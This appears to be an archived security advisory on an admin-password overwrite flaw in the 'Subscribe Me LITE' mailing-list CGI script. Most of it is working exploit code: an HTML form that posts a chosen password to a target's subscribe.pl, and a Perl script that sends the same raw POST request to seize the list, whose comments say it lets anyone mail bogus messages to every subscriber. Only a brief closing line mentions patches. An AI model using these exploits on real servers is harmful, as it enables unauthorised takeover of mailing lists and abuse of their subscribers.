COMMAND

    Subscribe Me

SYSTEMS AFFECTED

    ALL version numbers LITE only

PROBLEM

    'n30' found following.  Yet again the script allows a remote  user
    to overwrite the Admin Passwd file with any password they see fit.
    Therefore giving them Admin access to the Maillist Script.

    Exploit:

    <html>
    <FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
        <CENTER><BR>
        <TABLE BORDER="0" WIDTH="400">
          <TBODY>
          <TR>
            <TD>
    
            <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
              Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
            <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
            <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
            <CENTER>
            <TABLE BORDER="0">
              <TBODY>
              <TR>
                <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
                <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">passwor</FONT></TD>
              </TR>
              <TR>
                <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
                <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
              </TR>
              <TR>
                <TD ALIGN="CENTER"><BR>
                <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
                <TD><BR>
                <INPUT TYPE="RESET" NAME=""></TD>
              </TR></TBODY>
            </TABLE></CENTER></TD>
          </TR></TBODY>
        </TABLE>
    <FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
    </html>

    teleh0r added following code:

    #!/usr/bin/perl -w
    
    ## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
    ## This exploits changes the administrator password and
    ## let's anyone take over the mailing list. You can send
    ## bogus e-mail to everyone on the list.
    ##
    ## May work on earlier versions, but not sure - not sure
    ## if it will work on the Professional version either.
    ##
    ## teleh0r@doglover.com / anno 2000
    ## httpd://teleh0r.cjb.net
    
    use strict;
    use Socket;
    
    if (@ARGV < 2) {
        print("Usage: $0 <target> <newpass>\n");
        exit(1);
    }
    
    my($target,$newpass,$crypt,$length,$command,
       $agent,$sploit,$iaddr,$paddr,$proto);
    
    ($target,$newpass) = @ARGV;
    
    $crypt = crypt($newpass, 'aa');
    $length = 34 + length($newpass);
    
    print("\nRemote host: $target\n");
    print("CGI-script: /cgi-bin/subscribe.pl\n");
    print("New password: $newpass / $crypt\n\n");
    
    $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
    $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
    
    $sploit=
    "POST /cgi-bin/subscribe.pl HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $command";
    
    $iaddr = inet_aton($target)                     || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    sleep(2);
    print("Check out: http://$target/cgi-bin/subscribe.pl\n");
    
    exit(0);

SOLUTION

    Patches  are  already  available  at  website, download version is
    patched.